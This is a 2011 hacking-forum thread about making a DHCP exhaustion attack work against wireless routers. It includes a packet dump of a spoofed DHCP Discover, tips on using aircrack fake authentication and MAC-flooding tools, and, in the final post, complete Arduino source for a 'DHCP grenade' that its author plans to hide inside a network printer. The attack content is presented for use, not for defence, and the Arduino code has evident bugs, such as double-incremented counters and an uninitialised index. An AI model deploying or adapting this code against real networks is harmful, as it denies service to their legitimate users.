Dhcp Exhuastion Issues?

[EternaL]

Hello Guys,

I'm writing a multi-purpose network exploitation tool and I'm towards the end. One of the functions my tool does is DHCP Exhaustion which works great on my network at work (2k3 DHCP Server). But when I try to use it on my laptop connected to wifi somewhere(House, or android phone), the router doesn't respond to the DHCP Discovers.

The program generates a random MAC Address for each DHCP Discover packet it sends out. I'm starting to think the generated MAC might have to be authenticated against the router before it will respond to it.

I have included a text representation of a DHCP Discover packet sent from my program at the bottom. I dont know how well its going to be formatted in this post but hopefully it will be readable. I tried to just attach it as a txt file, but apparently txt files are to dangerous for me to upload. lol

Any Ideas?

Thanks,

No. Time Source Destination Protocol Info

22 2.360908 0.0.0.0 255.255.255.255 DHCP DHCP Discover - Transaction ID 0x502100d

Frame 22: 331 bytes on wire (2648 bits), 331 bytes captured (2648 bits)

Arrival Time: Jan 6, 2011 08:43:29.343771000 EST

Epoch Time: 1294321409.343771000 seconds

[Time delta from previous captured frame: 0.124144000 seconds]

[Time delta from previous displayed frame: 0.000000000 seconds]

[Time since reference or first frame: 2.360908000 seconds]

Frame Number: 22

Frame Length: 331 bytes (2648 bits)

Capture Length: 331 bytes (2648 bits)

[Frame is marked: False]

[Frame is ignored: False]

[Protocols in frame: eth:ip:udp:bootp]

[Coloring Rule Name: UDP]

[Coloring Rule String: udp]

Ethernet II, Src: 25:91:80:72:09:49 (25:91:80:72:09:49), Dst: Broadcast (ff:ff:ff:ff:ff:ff)

Destination: Broadcast (ff:ff:ff:ff:ff:ff)

Address: Broadcast (ff:ff:ff:ff:ff:ff)

.... ...1 .... .... .... .... = IG bit: Group address (multicast/broadcast)

.... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)

Source: 25:91:80:72:09:49 (25:91:80:72:09:49)

Address: 25:91:80:72:09:49 (25:91:80:72:09:49)

.... ...1 .... .... .... .... = IG bit: Group address (multicast/broadcast)

.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)

Type: IP (0x0800)

Internet Protocol, Src: 0.0.0.0 (0.0.0.0), Dst: 255.255.255.255 (255.255.255.255)

Version: 4

Header length: 20 bytes

Differentiated Services Field: 0x10 (DSCP 0x04: Unknown DSCP; ECN: 0x00)

0001 00.. = Differentiated Services Codepoint: Unknown (0x04)

.... ..0. = ECN-Capable Transport (ECT): 0

.... ...0 = ECN-CE: 0

Total Length: 317

Identification: 0x0000 (0)

Flags: 0x00

0... .... = Reserved bit: Not set

.0.. .... = Don't fragment: Not set

..0. .... = More fragments: Not set

Fragment offset: 0

Time to live: 128

Protocol: UDP (17)

Header checksum: 0x39a1 [correct]

[Good: True]

[bad: False]

Source: 0.0.0.0 (0.0.0.0)

Destination: 255.255.255.255 (255.255.255.255)

User Datagram Protocol, Src Port: bootpc (68), Dst Port: bootps (67)

Source port: bootpc (68)

Destination port: bootps (67)

Length: 297

Checksum: 0xd6d8 [validation disabled]

[Good Checksum: False]

[bad Checksum: False]

Bootstrap Protocol

Message type: Boot Request (1)

Hardware type: Ethernet

Hardware address length: 6

Hops: 0

Transaction ID: 0x0502100d

Seconds elapsed: 0

Bootp flags: 0x8000 (Broadcast)

1... .... .... .... = Broadcast flag: Broadcast

.000 0000 0000 0000 = Reserved flags: 0x0000

Client IP address: 0.0.0.0 (0.0.0.0)

Your (client) IP address: 0.0.0.0 (0.0.0.0)

Next server IP address: 0.0.0.0 (0.0.0.0)

Relay agent IP address: 0.0.0.0 (0.0.0.0)

Client MAC address: 25:91:80:72:09:49 (25:91:80:72:09:49)

Client hardware address padding: 00000000000000000000

Server host name not given

Boot file name not given

Magic cookie: DHCP

Option: (t=53,l=1) DHCP Message Type = DHCP Discover

Option: (53) DHCP Message Type

Length: 1

Value: 01

Option: (t=116,l=1) DHCP Auto-Configuration = AutoConfigure

Option: (116) DHCP Auto-Configuration

Length: 1

Value: 01

Option: (t=61,l=7) Client identifier

Option: (61) Client identifier

Length: 7

Value: 01259180720949

Hardware type: Ethernet

Client MAC address: 25:91:80:72:09:49 (25:91:80:72:09:49)

Option: (t=12,l=4) Host Name = "Howl"

Option: (12) Host Name

Length: 4

Value: 486f776c

Option: (t=60,l=8) Vendor class identifier = "ISFT 5.0"

Option: (60) Vendor class identifier

Length: 8

Value: 4953465420352e30

Option: (t=55,l=11) Parameter Request List

Option: (55) Parameter Request List

Length: 11

Value: 010f03062c2e2f1f21f92b

1 = Subnet Mask

15 = Domain Name

3 = Router

6 = Domain Name Server

44 = NetBIOS over TCP/IP Name Server

46 = NetBIOS over TCP/IP Node Type

47 = NetBIOS over TCP/IP Scope

31 = Perform Router Discover

33 = Static Route

249 = Private/Classless Static Route (Microsoft)

43 = Vendor-Specific Information

Option: (t=43,l=2) Vendor-Specific Information

Option: (43) Vendor-Specific Information

Length: 2

Value: dc00

End Option

[Sparda]

I'm starting to think the generated MAC might have to be authenticated against the router before it will respond to it.

Yep, this is often the case.

[EternaL]

Yep, this is often the case.

Any idea on how I can go about doing that? Does the Metasploit DHCP Exhaustion work against wireless routers?

Edited January 6, 2011 by EternaL

[Sparda]

You would have to keep changing the mac address of the adapter and authenticating. You could use a couple of adapters and do it in parallel to speed up the process though.

[Mr-Protocol]

There are tools out there like macflood or arpflood. dont remember which but i know it's a tool in backtrack that just spams out mac addresses to use up the DHCP IP pool.

[hexophrenic]

Actually, it would be associating that would be required most likely. Open networks would not require authentication, only association, depending on what you are testing. Also, 802.1x will "reset" for every MAC change so WPA/WPA2 would likely break if that is what you are testing.

[Mr-Protocol]

Open Wifi you can just do fakeauth with aircrack suite. Pending your card supports injection. There is a way if i'm not mistaken to blast the AP with fake authenticated users.

[Infiltrator]

Have you checked the Digininja DHCP project, it may give you some ideas.

http://www.digininja.org/metasploit/dns_dhcp.php

[EternaL]

Ok I figured out what was going on, for dhcp exhaustion the mac address does have to be authenticated to the wireless. I manually entered my mac in the ether header packets and bam! it worked.

thanks guys.

[sablefoxx]

DHCP attacks are fun, I recently wrote a Arduino sketch to preform DHCP Exhaustion attacks on (ethernet) networks. Thinking about hiding in a network printer or something.

/*** 
 *    Net~nade: The hand held DHCP grenade (exhaustion attack)
 *  Written by: Sablefoxx
 */
#include <Ethernet.h>
#include <EthernetDHCP.h>

/* Function Prototypes */
void requestIp(byte);
void displayMac(byte);
const char* addressToString(const uint8_t* ip);

/* Setup */
void setup()
{
  Serial.begin(9600);
}

/* Main Loop */
void loop()
{
  byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x01};
  for(int hexFour = 0; hexFour < 256; ++hexFour)
  {
    for(int hexFive = 0; hexFive < 256; ++hexFive)
    {
      requestIp(mac);
      mac[5]++;
      hexFive++;
      EthernetDHCP.maintain();
    }
    mac[4]++;      // Incriment 4th hex value
    mac[5] = 0x01; // Reset 5th hex value
    hexFour++;     // Incriment count
  }
}

void requestIp(byte mac[])
{
  Serial.print("[*] Attempting to obtain DHCP lease...");
  EthernetDHCP.begin(mac);
  const byte* ip = EthernetDHCP.ipAddress();
  const byte* gateway = EthernetDHCP.gatewayIpAddress();
  Serial.println("got it!");

  Serial.print("[+] From ");
  Serial.print(addressToString(gateway));
  Serial.print(" got ");
  Serial.print(addressToString(ip));
  Serial.print(" with ");
  displayMac(mac);
  Serial.print("\n");
}

void displayMac(byte mac[])
{
  for(int index; index <= 5; ++index)
  {
    Serial.print(mac[index], HEX);
    if(index < 5)
    {
      Serial.print(":");
    }
  }
}

const char* addressToString(const uint8_t* ip)
{
  static char buf[16];
  sprintf(buf, "%d.%d.%d.%d\0", ip[0], ip[1], ip[2], ip[3]);
  return buf;
}

Edited January 27, 2011 by sablefoxx